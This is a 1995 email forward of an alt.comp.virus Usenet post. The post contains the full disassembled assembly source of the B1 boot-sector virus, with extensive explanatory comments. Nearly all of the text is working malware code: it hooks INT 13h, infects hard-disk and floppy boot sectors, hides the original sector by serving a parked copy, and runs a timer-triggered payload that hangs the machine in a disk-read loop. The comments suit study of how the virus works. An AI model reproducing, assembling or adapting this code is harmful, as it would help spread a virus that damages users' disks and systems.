|
From smtp Tue Feb 7 13:16 EST 1995
|
|||
|
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:16 EST
|
|||
|
Received: by lynx.dac.neu.edu (8.6.9/8.6.9)
|
|||
|
id NAA01723 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:19:13 -0500
|
|||
|
Date: Tue, 7 Feb 1995 13:19:13 -0500
|
|||
|
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
|
|||
|
Content-Length: 10347
|
|||
|
Content-Type: binary
|
|||
|
Message-Id: <199502071819.NAA01723@lynx.dac.neu.edu>
|
|||
|
To: pobox.jwu.edu!joshuaw
|
|||
|
Subject: (fwd) B1
|
|||
|
Newsgroups: alt.comp.virus
|
|||
|
Status: O
|
|||
|
|
|||
|
Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
|
|||
|
From: danishm@iia.org ()
|
|||
|
Newsgroups: alt.comp.virus
|
|||
|
Subject: B1
|
|||
|
Date: 5 Feb 1995 22:05:37 GMT
|
|||
|
Organization: International Internet Association.
|
|||
|
Lines: 330
|
|||
|
Message-ID: <3h3i3h$v4@ankh.iia.org>
|
|||
|
NNTP-Posting-Host: iia.org
|
|||
|
X-Newsreader: TIN [version 1.2 PL2]
|
|||
|
|
|||
|
Here is the B1 virus:
|
|||
|
|
|||
|
|
|||
|
PAGE 59,132                             ; MASM listing directive: 59 lines x 132 columns per page
|
|||
|
; Disassembled using sourcer
|
|||
|
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
|
|||
|
;[[ [[
|
|||
|
;[[ B1 [[
|
|||
|
;[[ [[
|
|||
|
;[[ Created: 8-Jan-95 [[
|
|||
|
;[[ Version: [[
|
|||
|
;[[ Code type: zero start [[
|
|||
|
;[[ Passes: 5 Analysis Options on: none [[
|
|||
|
;[[ [[
|
|||
|
;[[ [[
|
|||
|
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
|
|||
|
|
|||
|
; Absolute addresses in segment 0000h that the code reads or writes.
; (Values in parentheses are what Sourcer saw in the captured image.)
data_1e equ 413h                        ; (0000:0413=7Fh)  BIOS data area 0040:0013, base memory size in KB
data_2e equ 46Dh                        ; (0000:046D=17E1h) BIOS data area 0040:006D, timer tick count (low word)
data_3e equ 4Ch                         ; (0006:004C=0DAh) interrupt vector table slot of INT 13h (13h*4)
|
|||
|
|
|||
|
seg_a segment byte public               ; the whole 512-byte boot-sector image is one segment
assume cs:seg_a, ds:seg_a

org 0                                   ; offsets are relative to the sector start; the code only
                                        ; uses cs-relative addressing and relocates itself at run time
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; virus - B1 boot-sector infector: boot entry (offset 0000h) and the
;         resident INT 13h handler (entry at offset 0044h).
;
; Image layout (offsets as in the Sourcer listing):
;   0000h  jmp short loc_2 + nop, then the host's BPB (0003h-003Fh); sub_5
;          never copies 0002h-003Fh, so an infected sector keeps its own BPB
;   0040h  loc_2: one-time install path (push cs / call sub_1)
;   0044h  INT 13h handler entry; sub_1 points vector 0000:004C here
;   01BCh  saved original INT 13h vector (written by sub_1, used by sub_4)
;   0200h  one-sector scratch buffer in cs (set up by sub_6)
;
; Handler stack frame once loc_3 has executed "mov bp,sp":
;   [bp+00h] bp  [bp+02h] ds  [bp+04h] di  [bp+06h] si  [bp+08h] es
;   [bp+0Ah] dx  [bp+0Ch] cx  [bp+0Eh] bx  [bp+10h] ax (caller's ax)
;   [bp+12h] ip  [bp+14h] cs  [bp+16h] flags  (interrupt frame, see iret)
;
; Only functions 02h (read) and 03h (write) are inspected, and only when
; the cylinder byte ch is 0; everything else is chained to the original
; vector at loc_14.  Behaviour summary (all visible below):
;   read  of cyl 0        -> infect the drive's C0/H0/S1 if sub_2 says it is clean
;   read  of C0/H0/S1     -> serve the hidden original sector instead (stealth)
;   write (any, cyl 0)    -> after the pass-through, time-dependent payload at loc_8
; Analyst notes: 1 KB is taken from the BIOS memory size (0040:0013); the
; 40h bytes at offset 0040h are the self-recognition signature compared by
; sub_2; the original boot sector is parked at C0/H0/S17 on hard disks or
; in the last root-directory sector on floppies (sub_3).
;-----------------------------------------------------------------------
virus proc far

start:
        jmp short loc_2                 ; (0040) skip over the BPB
        db 90h, 00h, 4Dh, 4Dh, 49h, 00h ; nop, then the OEM name field
        db 33h, 2Eh, 33h, 00h, 02h, 01h ; ... 0Bh: bytes/sector 0200h, 0Dh: sectors/cluster 1
        db 01h, 00h, 02h,0E0h, 00h, 40h ; reserved sectors 1, FATs 2, root entries 0E0h, ...
        db 0Bh,0F0h, 09h, 00h, 12h, 00h ; total sectors 0B40h, media 0F0h, 9 sectors/FAT, 18 sectors/track
        db 02h, 00h                     ; 2 heads  (values match a 1.44 MB floppy)
        db 19 dup (0)
        db 12h, 00h, 00h, 00h, 00h, 01h ; rest of the sample's BPB / extended boot record area
        db 00h,0FAh, 33h,0C0h, 8Eh,0D0h ; FA 33 C0 8E D0 BC 00 7C 16 07 decode to cli / xor ax,ax /
        db 0BCh, 00h, 7Ch, 16h, 07h     ; mov ss,ax / mov sp,7C00h / push ss / pop es - a typical DOS
                                        ; boot-sector prologue; not reachable from the jmp at 0000h
loc_2:                                  ; (0040) runs once, when the infected sector is booted
        push cs                         ; becomes the CS of the final retf at loc_13
        call sub_1                      ; (00EF) go resident and hook INT 13h; sub_1 pops the return
                                        ;        address 0044h and does not come back here
        push ax                         ; --- INT 13h handler entry (0044h) ---
        shr ax,1                        ; ah = function / 2, al bit 7 = function bit 0
        dec ah                          ; zero only for functions 02h and 03h
        jz loc_3                        ; read / write: inspect
        jmp loc_14                      ; (01BA) anything else: chain to the original vector
loc_3:
        push bx
        push cx
        push dx
        push es
        push si
        push di
        push ds
        push bp
        mov bp,sp                       ; bp = frame described in the header comment
        or ch,ch                        ; cylinder byte != 0: cannot be a boot sector
        jnz loc_5                       ;   -> plain pass-through
        shl al,1                        ; CF = function bit 0 (1 = write)
        jc loc_4
        ; --- read on cylinder 0: infect the target drive if it is still clean ---
        call sub_6                      ; (0190) ax=0201h bx=0200h cx=0001h dh=0 es=cs
        call sub_4                      ; (017B) read C0/H0/S1 of drive dl into cs:0200h
        jc loc_7                        ; BIOS error: hand it back to the caller
        call sub_2                      ; (0127) compare 40h bytes at 0040h with the sector read
        jz loc_4                        ; already infected
        call sub_6                      ; (0190)
        call sub_3                      ; (013B) cx/dh = where to park the original sector
        jz loc_5                        ; no usable location: leave the disk alone
        inc ah                          ; ah = 03h, write
        call sub_4                      ; (017B) park the original boot sector at cx/dh
        jc loc_5
        call sub_5                      ; (0182) splice the virus body into the buffer, BPB kept
        call sub_6                      ; (0190)
        inc ah
        call sub_4                      ; (017B) write the infected sector back to C0/H0/S1
loc_4:
        call sub_7                      ; (019E) reload the caller's ax,bx,cx,dx,es from the frame
        or ch,dh                        ; ch = 0, dh = 0 and cl = 1  <=>  caller wants C0/H0/S1
        dec cx
        jnz loc_5                       ; some other sector: pass through
        ; --- stealth: return the parked original instead of the infected sector ---
        call sub_6                      ; (0190)
        call sub_4                      ; (017B) read the real C0/H0/S1 into cs:0200h
        jc loc_7
        call sub_2                      ; (0127)
        jnz loc_5                       ; not infected: pass through
        call sub_7                      ; (019E) caller's registers again
        call sub_3                      ; (013B) cx/dh = parked original (ZF result not checked here)
        dec byte ptr [bp+10h]           ; caller's al (sector count) minus one
        jz loc_6                        ; single sector: read the parked copy into the caller's es:bx
        mov al,1
        call sub_4                      ; (017B) first sector from the parked copy
        jc loc_7
        call sub_7                      ; (019E) al = remaining count (frame copy was decremented)
        add bx,di                       ; di = 0200h as left by sub_2: advance the buffer one sector
        inc cl                          ; continue at sector 2
        jmp short loc_6                 ; (00BA) remaining sectors are read from the real disk
loc_5:
        call sub_7                      ; (019E) pass-through with the caller's registers
loc_6:
        call sub_4                      ; (017B)
loc_7:
        pushf                           ; flags of the last operation (normally the BIOS call's CF)
        pop bx
        mov [bp+16h],bx                 ;   become the flags the iret returns to the caller
        xchg ax,[bp+10h]                ; caller receives the BIOS ax; ax = caller's original ax
        shr ah,1                        ; CF = original function bit 0
        jnc loc_9                       ; read: done
        ; --- write: time-dependent trigger ---
        xor ax,ax
        mov ds,ax
        mov ax,ds:data_2e               ; (0000:046D) BIOS timer tick count, low word
        and ax,178Fh
        jnz loc_9                       ; fires only when all of these bits are clear
        call sub_6                      ; (0190)
loc_8:                                  ; read C0/H0/S1 and C1023/H0/S1 alternately until the BIOS
        push ax                         ; status in ah has bit 7 set; the caller does not get control back
        call sub_4                      ; (017B)                                  until then
        xor cx,0FFC0h                   ; toggle every cylinder bit (ch and cl bits 7..6)
        nop                             ;*ASM fixup - sign extn byte
        shl ax,1                        ; CF = ah bit 7
        pop ax
        jnc loc_8
loc_9:
        pop bp
        pop ds
        pop di
        pop si
        pop es
        pop dx
        pop cx
        pop bx
        pop ax
        iret                            ; flags come from [bp+16h] as patched at loc_7
virus endp
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; sub_1 - one-time installer, entered from loc_2 via "push cs / call sub_1".
; In:    stack = [return 0044h][cs]; cs = segment this sector runs in
; Does:  takes 1 KB off the BIOS base memory size (0040:0013), copies the
;        image to the segment of that kilobyte ("newseg" below) with sub_5,
;        saves the original INT 13h vector at newseg:01BCh, points
;        0000:004C at newseg:0044h, then far-returns into the copy at 01AEh.
; Out:   never returns to the caller; leaves es = original cs, bx = 0 and
;        the word 0 on the stack for the retf at loc_13
; Clobb: ax,bx,cx,dx,si,di,ds,es, flags
;-----------------------------------------------------------------------
sub_1 proc near
        mov bx,44h                      ; 0044h: the return offset pushed by the call, and the
                                        ;        handler entry used as the new vector offset
        mov dx,80h                      ; dl = 80h, first hard disk (consumed by loc_13)
        mov si,data_1e                  ; (0000:0413) base memory size in KB
        xor di,di
        mov ds,di                       ; ds = 0000h
        dec word ptr [si]               ; hide 1 KB from BIOS/DOS
        lodsw                           ; ax = new size in KB
        pop si                          ; si = 0044h (return address of the call)
        mov cl,6
        shl ax,cl                       ; KB * 64 = segment of the hidden kilobyte
        mov es,ax                       ; es = newseg (copy destination)
        sub si,bx                       ; si = 0044h - 0044h = 0, start of the image
        push si                         ; [A] 0000h: IP for the retf at loc_13
        push ax                         ; [B] newseg: CS for the retf below
        mov ax,1AEh
        push ax                         ; [C] 01AEh: IP for the retf below (the "inc cx" byte)
        push cs                         ; [D] popped into es below
        push si                         ; [E] 0000h, popped into bx below
        push cs
        pop ds                          ; ds = cs: copy source is ds:si = cs:0000
        call sub_5                      ; (0182) copy to newseg; returns cx = 0, di = 01BCh
        mov ds,cx                       ; ds = 0000h (cx is 0 after sub_5's rep movsb)
        mov si,data_3e                  ; (0000:004C) INT 13h vector
        mov cl,2
        rep movsw                       ; save the original vector at newseg:01BCh
        mov [si-4],bx                   ; 0000:004C = 0044h (new handler offset)
        mov [si-2],es                   ; 0000:004E = newseg
        pop bx                          ; [E] bx = 0
        pop es                          ; [D] es = original cs
        retf                            ; [C][B] continue at newseg:01AEh
sub_1 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; sub_2 - self-recognition check of a sector buffer.
; In:    bx = buffer offset in cs (0200h from sub_6), es = cs,
;        ch expected to be 0 (cx = 1 from sub_6); cl is set to 40h here
; Does:  compares cs:[0040h..007Fh] with buffer[0040h..007Fh]
; Out:   ZF = 1 if the buffer already carries the virus code;
;        ds = cs, si = 0, di = bx; cx clobbered (0 after a full match)
;-----------------------------------------------------------------------
sub_2 proc near
        cld
        push cs
        pop ds                          ; ds = cs
        xor si,si                       ; si = 0: our own image
        mov di,bx                       ; di = buffer
        mov cl,40h                      ; '@'  compare 40h bytes
        push si
        push di
        add si,cx                       ; skip 0000h-003Fh (jmp + host BPB) on both sides
        add di,cx
        repe cmpsb                      ; ZF = 1 <=> all 40h bytes equal
        pop di
        pop si                          ; pop/retn leave ZF for the caller
        retn
sub_2 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; sub_3 - choose the sector in which the original boot sector is parked.
; In:    dl = drive (bit 7 set = hard disk); di = buffer holding that
;        drive's boot sector, BPB fields read at di+11h (root entries),
;        di+16h (sectors per FAT), di+18h (sectors per track), di+1Ah (heads)
; Out:   cx/dh = cylinder/sector/head in INT 13h form, ZF = 0;
;        on failure cx = 0 and ZF = 1.
;        Hard disk: fixed C0/H0/S17 (cx = 0011h, dh = 0).
;        Floppy: logical sector 2*sectorsPerFAT + rootEntries/16 converted
;        to CHS - with the usual single reserved sector that is the last
;        sector of the root directory.
; Clobb: cx, dh, flags (ax preserved)
;-----------------------------------------------------------------------
sub_3 proc near
        push ax
        xor dh,dh                       ; head 0
        test dl,80h                     ; hard disk?  (also leaves ZF = 0 for the success return)
        jz loc_10
        mov cx,11h                      ; hard disk: cylinder 0, sector 17
        jmp short loc_11                ; (0175)
loc_10:                                 ; floppy: derive the location from the BPB
        mov ax,[di+11h]                 ; root directory entries
        mov cl,4
        shr ax,cl                       ; / 16 = root directory sectors (32-byte entries, 512-byte sectors)
        mov cx,ax
        mov ax,[di+16h]                 ; sectors per FAT
        shl ax,1                        ; x 2: two FATs assumed
        jc loc_12
        add ax,cx                       ; + root directory sectors
        jc loc_12
        xor cx,cx
        cmp ah,[di+18h]                 ; quotient must fit in al for the byte divide
        jae loc_12
        div byte ptr [di+18h]           ; al = track, ah = sector index (0-based)
        xchg cl,ah                      ; cl = sector index, ah = 0
        cmp ah,[di+1Ah]
        jae loc_12                      ; heads = 0: give up
        div byte ptr [di+1Ah]           ; al = cylinder, ah = head
        mov ch,al
        mov dh,ah
        inc cx                          ; sectors are 1-based; cx != 0 so ZF = 0
loc_11:
        pop ax
        retn
loc_12:
        xor cx,cx                       ; failure: cx = 0, ZF = 1
        jmp short loc_11                ; (0175)
sub_3 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; sub_4 - call the original INT 13h handler.
; In:    the usual INT 13h registers; cs:[01BCh] = saved original vector
;        (written there by sub_1)
; Out:   whatever the BIOS returns; every caller tests CF (jc) right after
;-----------------------------------------------------------------------
sub_4 proc near
        pushf                           ; flags + far return address = what an INT would push
        call dword ptr cs:[1BCh]        ; (7379:01BC=0D79h) saved original vector
        retn
sub_4 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; sub_5 - copy the virus body, leaving the BPB area of the target intact.
; In:    ds:si = source image at offset 0, es:di = destination at offset 0
; Does:  copies bytes 0000h-0001h (the jmp short) and 0040h-01BBh
;        (17Ch = 380 bytes); 0002h-003Fh of the destination are untouched
; Out:   cx = 0, si and di advanced by 01BCh, DF cleared
;-----------------------------------------------------------------------
sub_5 proc near
        cld
        movsw                           ; the 2-byte "jmp short loc_2"
        mov cx,17Ch                     ; 380 bytes of code, 0040h..01BBh
        add si,3Eh                      ; skip to 0040h on both sides
        add di,3Eh
        rep movsb
        retn
sub_5 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; sub_6 - register set for "one sector, C0/H0/S1, buffer cs:0200h".
; Out:   ax = 0201h (read, 1 sector), bx = 0200h, cx = 0001h, dh = 0,
;        es = cs; dl (drive) is left as it is. Callers "inc ah" to write.
;-----------------------------------------------------------------------
sub_6 proc near
        push cs
        mov ax,200h
        mov bx,ax                       ; bx = 0200h, scratch buffer right after the 512-byte image
        xor cx,cx
        xor dh,dh
        inc cx                          ; cx = 0001h: cylinder 0, sector 1
        inc ax                          ; ax = 0201h
        pop es                          ; es = cs
        retn
sub_6 endp
|
|||
|
|
|||
|
|
|||
|
;__________________________________________________________________________
|
|||
|
; SUBROUTINE
|
|||
|
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
|
|||
|
|
|||
|
;-----------------------------------------------------------------------
; sub_7 - reload the caller's INT 13h registers from the handler frame.
; In:    bp = sp as set at loc_3, i.e. [bp+10h] = ax pushed at 0044h,
;        [bp+0Eh] bx, [bp+0Ch] cx, [bp+0Ah] dx, [bp+08h] es
; Out:   ax,bx,cx,dx,es = the values the caller passed to INT 13h
;        (si, di and ds are not reloaded)
;-----------------------------------------------------------------------
sub_7 proc near
        mov ax,[bp+10h]
        mov bx,[bp+0Eh]
        mov cx,[bp+0Ch]
        mov dx,[bp+0Ah]
        mov es,[bp+8]
        retn
sub_7 endp
|
|||
|
|
|||
|
; --- 01AEh: target of sub_1's retf; the INT 13h hook is already installed here ---
        db 41h                          ; inc cx: cx = 1 (sector 1) after sub_1 left it at 0
loc_13:
        mov ax,201h                     ; read one sector, C0/H0/S1 (cx = 1, dh = 0 from sub_1)
        int 13h                         ; into es:bx = original cs:0000, through the new handler
        xor dl,80h                      ; pass 1: dl = 80h (hard disk)  ->  pass 2: dl = 00h (floppy)
        jz loc_13
        retf                            ; -> original cs:0000 ([A] from sub_1 + the cs pushed at loc_2),
                                        ;    i.e. whatever sector the second read left there
loc_14:                                 ; (01BA) INT 13h functions other than 02h/03h
        pop ax
        ; jmp far ptr loc_1 - far jump opcode; its 4-byte operand at 01BCh is overwritten by
        ; sub_1 with the original INT 13h vector (000A:0D79 is just the captured image's content)
        db 0EAh, 79h, 0Dh, 0Ah, 00h
        ; 01C0h onward is outside the range sub_5 copies: on an infected disk these bytes are
        ; whatever the host sector held. Here: a DOS boot-sector message and system file names.
        db 0Dh, 0Ah, 'Disk Boot failure', 0Dh
        db 0Ah, 0
        db 'IBMBIO COMIBMDOS COM'
        db 18 dup (0)
        db 55h,0AAh                     ; boot-sector signature at 01FEh
|
|||
|
|
|||
|
seg_a ends

end start                               ; entry point = offset 0000h, the jmp short over the BPB
|
|||
|
|
|||
|
ls virus.asm
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ls virus.asm
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--
|
|||
|
Eric "Mad Dog" Kilby maddog@ccs.neu.edu
|
|||
|
The Great Sporkeus Maximus ekilby@lynx.dac.neu.edu
|
|||
|
Student at the Northeastern University College of Computer Science
|
|||
|
"I Can't Believe It's Not Butter"
|
|||
|
|